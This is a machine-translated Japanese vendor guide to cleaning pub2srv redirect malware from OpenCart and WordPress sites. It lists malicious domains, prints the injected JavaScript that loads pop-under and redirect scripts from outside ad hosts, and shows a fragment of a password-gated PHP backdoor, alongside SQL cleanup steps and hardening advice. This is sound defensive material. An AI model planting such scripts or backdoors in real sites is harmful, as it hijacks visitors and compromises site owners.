ネットワークセキュリティー
 Computer >> コンピューター >  >> ネットワーキング >> ネットワークセキュリティー

OpenCart または WordPress Web サイトから pub2srv マルウェアを削除する方法

私たちは、OpenCart と WordPress の Web サイトを標的とする特定のマルウェア感染を数か月にわたって監視してきました。これは一般に pub2srv マルウェア感染と呼ばれ、Web サイトの訪問者を他の悪意のあるドメインにリダイレクトします

go.pub2srv[.]com

go.mobisla[.]com

go.oclaserver[.com]

deloton.com/afu.php?zoneid= site

Dolohen.com

また、Google は、ウェブサイト上の悪意のあるリンクの下で広告を一時停止します。それらのいくつかは

https://defpush.com/ntfc.php?p=1565632https://deloplen.com/apu.php?zoneid=1558096https://go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1https://mobpushup.com/notice.php?p=1558098&interactive=1&pushup=1https://wowreality.info/page.js?wm=gr OpenCart または WordPress Web サイトから pub2srv マルウェアを削除する方法

フォーラムでの WordPress ユーザー リクエスト ヘルプのスクリーンショット

pub2srv マルウェアとは?その症状は何ですか?

これは、OpenCart および WordPress サイトをスパム Web ページにリダイレクトさせるマルウェアです。モバイル デバイスでは、広告やフィッシング ページを含むスパム ポップアップまたは通知が開きます。

pub2srv マルウェアは、Web ページのソースに悪意のある JavaScript コードを挿入し、リダイレクト/ポップアップを引き起こします。 Opencart の場合、SQL インジェクションの脆弱性が原因です ハッカーが悪意のあるコードをデータベースに追加できるようにします。 WordPress の場合、ハッカーは index.php または functions.php ファイルを変更してペイロードを挿入できます。

このハッキングの典型的な症状:

<オール>
  • あなたの Web サイトの訪問者は、広告、ポルノ、フィッシング ページを含むスパム Web サイトにリダイレクトされます。ウェブサイトが複数のリダイレクトに直面している理由に関する詳細なブログをご覧ください。
  • アプリのインストールを促すモバイル デバイスのポップアップ
  • AJAX に依存するプラグインが機能しなくなります (例:TablePress、DataTables など)
  • Google によってブラックリストに登録されているか、広告が停止されています。ブログをチェックして、中断された広告を元に戻してください。
  • ソース内の認識されない JavaScript コード

    • ハッキングの結果

    このマルウェアの根本的な原因は SQL インジェクション (SQLi) の脆弱性であるため、攻撃者は次のことができます。

    • データベースのコンテンツを追加、削除、編集、または読み取る
    • データベース サーバー上のファイルからソース コードを読み取る
    • データベース サーバーにファイルを書き込む
    • WordPress/Opencart ウェブサイトのユーザー レコードとパスワードを盗む
    • OpenCart/WooCommerce ストアでの取引情報の盗難
    • ドメインで SEO スパムを実行すると、Google ウェブマスターのブラックリストに登録されます

    Web サイトから pub2srv マルウェア コードを削除する方法

    OpenCart で 、マルウェアは通常、データベースに感染し、そのコードを次のデータベーステーブルに配置します:

    <オール>
  • oc_product_description テーブル (製品説明)
  • oc_category_description テーブル (カテゴリの説明)

    • 次の手順に従って、OpenCart データベースから悪意のあるコードを削除してください:

    <オール>
  • phpMyAdmin や Sequel Pro などのツールを使用してデータベース テーブルをプレビューします
  • 「oc_category_description」テーブルを開き、「説明」列の値を調べます。
  • 次のような JavaScript コード スニペットが表示されます:
    
<script type="text/javascript">//<![CDATA[ (function() { var configuration = { "token": "XXXXXXXXXXXXX", "exitScript": { "enabled": true }, "popUnder": { "enabled": true } }; var script = document.createElement(''script''); script.async = true; script.src = ''//cdn.shorte[.st]/link-converter.min.js''; script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != ''complete'' && rs != ''loaded'') return; shortestMonetization(configuration);}; var entry = document.getElementsByTagName(''script'')[0]; entry.parentNode.insertBefore(script, entry); })(); //]]></script><script data-cfasync=''false'' type=''text/javascript'' src=''//pXXXXX.clksit[e.com/]adServe/banners?tid=XXXXX_127XXX_7&tagid=2''></script><script type="text/javascript" src="//[go.pub2srv][.com/ap]u.php?zoneid=XXXXXX"></script><script async="async" type="text/javascript" src="//g[o.mobisl]a.co[m/notice.ph]p?p=XXXXXX&interactive=1&pushup=1"></script>
  • 必要な置換を行った後、次の SQL コード スニペットを実行します:
    
UPDATE oc89gWs_category_description
SET description = REPLACE (description, 'INSERT MALICIOUS CODE FROM PREVIOUS STEP', '');
  • oc_product_description テーブルに対して上記のすべての手順を繰り返します

    • WordPress で 、マルウェアは通常、WordPress ファイルで見つかります:

    <オール>
  • index.php
  • functions.php
  • データベース テーブル

    • 次の手順に従って、WordPress サーバーから悪意のあるコードを削除してください:

    <オール>
  • index.php ファイルを開く (public_html フォルダー) &wp-content/themes/NAME-OF-THEME/functions.php サーバー上
  • これらのファイルで、なじみのないコード、意味不明なコード、暗号化されたコードを検索します。次のようなコードが見つかる場合があります:
    <?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX'))
 {
 
if ( ! function_exists( 'wp_temp_setup' ) ) { 
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
?>
  • これらのファイルのいずれかに悪意のあるコードが見つかった場合は、最新の既知の正常なバックアップからファイルを置き換える必要があります。
  • また、上記の OpenCart の手順で説明したように、データベース内のテーブルを確認してください。
  • また、wp-include で ディレクトリ:wp-vcd.php を削除します および class.wp.php ファイル、wp-include ディレクトリ:post.php を開き、マルウェアによって追加された最初の php タグを削除します。テーマの functions.php ファイルを開き、上記のコードを削除します。 (コメントで読者の Jaber の 1 人が提案)
    • OpenCart または WordPress Web サイトから pub2srv マルウェアを削除する方法

    再感染を防ぎ、原因を特定する手順

    <オール>
  • OpenCart/WordPress ウェブサイトを最新バージョンに更新: CMS コアの既知のセキュリティ問題を修正する
  • SQL インジェクション攻撃をブロック: Web サイトに到達する前に SQL インジェクション (SQLi) 攻撃を積極的に検出してブロックする、Astra のようなセキュリティ プラグインを使用してください。
  • 管理者アカウントのユーザー名とパスワードを変更する: マルウェアのクリーンアップ後、ハッカーが Web サイトに引き続きアクセスできないようにする
  • データベース パスワードの変更: ハッカーがデータベースに直接接続できないなど
  • 暗号化キーの変更: なりすましやその他の暗号攻撃を防ぐため
  • 管理エリアへのアクセスをホワイトリストに登録された IP アドレスのみに制限する: 承認された管理者のみがバックエンド管理エリアにアクセスできるようにする
  • 未使用のプラグイン/拡張機能をアンインストール: 維持されなくなった場合、そもそもハッキングの原因となるセキュリティ上の問題が含まれている可能性があります
  • スキャン サーバー ログ (アクセスとエラー): ログに、ハッキングのソースと時刻を示す、見慣れないエラーや意味不明なエラーが見つかる場合があります

    • 関連ガイド – WordPress ハックの除去

    OpenCart または WordPress Web サイトから pub2srv マルウェアを削除する方法

    また、WordPress のファビコン (.ico) ウイルス バックドアに関するブログ記事もご覧ください。

    Astra Web Protection について

    Astra Web Protection は、CMS 向けのエンドツーエンドのセキュリティ ソリューションです。ボタンをクリックするだけで、100 以上の攻撃、悪意のあるボット、マルウェアから身を守ることができます。当社のセキュリティ エキスパートは、オンライン ビジネスを保護するために 24 時間 365 日サポートを提供します。専門家のサポートが必要な場合、またはウェブサイトが 100% クリーンで安全であることを確認する方法を知りたい場合は、下のチャット ウィジェットでご連絡ください!


    1. Google ブラックリスト – Google ブラックリストからウェブサイトを削除する方法 (WordPress、Magento、PrestaShop、OpenCart、Drupal &PHP)

      Web サイトの検索結果に、サイトが疑わしい可能性があるという警告が表示されていませんか?悪い知らせがありますが、あなたのウェブサイトは Google のブラックリストに登録されています。ハッキングまたはマルウェアの影響を受けたサイトには、ユーザーを保護するためにこれらの警告が表示されることがよくあります。ただし、これは評判に影響を与える可能性があります。あなたが Google のブラックリストに登録された理由を詳しく知り、あなたのサイトをブラックリストから削除するには、以下をお読みください。 Google ブラックリストとは Google ブラック リストは、Google が管理するデー

    2. Emotet マルウェアとは何か、Mac から削除する方法 (2022)

      Emotet マルウェアとは Emotet は、バンキング型トロイの木馬マルウェアの一種です これは、2014 年にドイツとオーストリアの銀行がサイバー攻撃を受けた際に初めて検出されました。感染は、主にマルスパム (悪意のあるコンテンツを含むスパムメール) を介して広がります。狡猾な Emotet マルウェアは、システムに保存されている機密情報を破壊することを目的としています。保存されたパスワードを含む個人データを盗み、ブラウジング アクティビティを追跡します。 必読: Mac のウイルスをチェックする方法は? Emotet マルウェアはどのように拡散するのですか? まあ、主な配